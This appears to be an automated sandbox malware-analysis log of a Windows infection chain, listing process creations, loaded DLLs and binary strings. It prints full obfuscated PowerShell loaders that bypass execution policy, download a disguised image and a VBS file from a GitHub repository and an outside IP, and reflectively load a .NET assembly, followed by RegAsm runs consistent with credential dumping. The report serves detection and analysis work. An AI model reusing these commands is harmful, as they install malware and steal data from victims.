                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXeJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                  Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                  Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.pdbhP\ source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.535276986.000007FE89C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.535388004.000007FE89C40000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
